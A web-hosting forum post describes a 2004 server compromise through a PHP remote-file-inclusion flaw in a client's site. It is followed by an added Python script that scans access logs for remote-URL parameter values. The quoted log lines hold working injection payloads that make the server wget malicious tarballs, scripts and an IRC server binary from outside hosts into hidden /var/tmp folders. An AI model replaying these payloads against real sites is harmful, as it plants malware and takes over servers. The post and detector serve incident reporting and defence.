bad coding - uploading trojan

What a day,

My server has been down all day because of some bad coding of one of the sites I'm hosting. We (actually a friend) discovered some weird programs (ex. a program called "dor" - IRC file server) in /var/tmp, it generated so much traffic at the nameserver port that it killed all sites. It recreated itself when we tried to delete it.

We found out it was caused by bad programming at one of the sites I'm hosting. They didn't validate the values of the variables - the trojans got into my server by using this:

202.159.43.33 - - [17/Oct/2004:04:41:52 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp;wget%20pemula.port5.com/mumet.tar.gz HTTP/1.1" 200 15797 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:04:43:45 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp/.xfs/.inoe/scripts;wget%20freewebs.com/hikaro82/hikaro.tcl HTTP/1.1" 200 15315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:04:44:14 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp/.xfs/.inoe;wget%20http://www.geocities.com/altbot//hikare.txt HTTP/1.1" 200 14918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:05:20:03 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp;wget%20pemula.port5.com/dor HTTP/1.1" 200 14891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:12:44:50 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp/.tmp;wget%20pemula.port5.com/dor HTTP/1.1" 200 14891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"
202.159.43.33 - - [17/Oct/2004:13:54:41 -0500] "GET /index.php?page=http://senyum.net/cmd.do%3f&cmd=cd%20/var/tmp;wget%20pemula.port5.com/dor HTTP/1.1" 200 14890 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [en]"

- It is impossible to do anything against bad coding from clients, so is there any way to protect against something like this in the future?
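
One way a host can spot this pattern in access logs without touching client code, as an added example that is not part of the original post: flag any request where a query parameter value decodes to an absolute URL. The log lines are constructed samples using documentation addresses and hosts, and `find_remote_includes` is a hypothetical helper name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL is the signature to flag.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_includes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = value.strip()
            if REMOTE_RE.match(value):
                findings.append({
                    "client": m.group("client"),
                    "when": m.group("when"),
                    "param": name,
                    "remote_host": urlsplit(value).hostname,
                    "status": int(m.group("status")),
                })
    return findings

# Constructed sample lines (documentation IPs and example.org hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2004:04:41:52 -0500] "GET /index.php?page=http://files.example.org/inc.txt%3f&x=1 HTTP/1.1" 200 15797 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [17/Oct/2004:04:42:10 -0500] "GET /index.php?page=HTTP%3A%2F%2Ffiles.example.org%2Finc.txt HTTP/1.1" 200 15000 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [17/Oct/2004:04:45:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [17/Oct/2004:04:46:00 -0500] "GET /search.php?q=what+is+http HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for finding in find_remote_includes(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request means the script answered normally, so those hits are the ones to review first.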

 

 

 

 
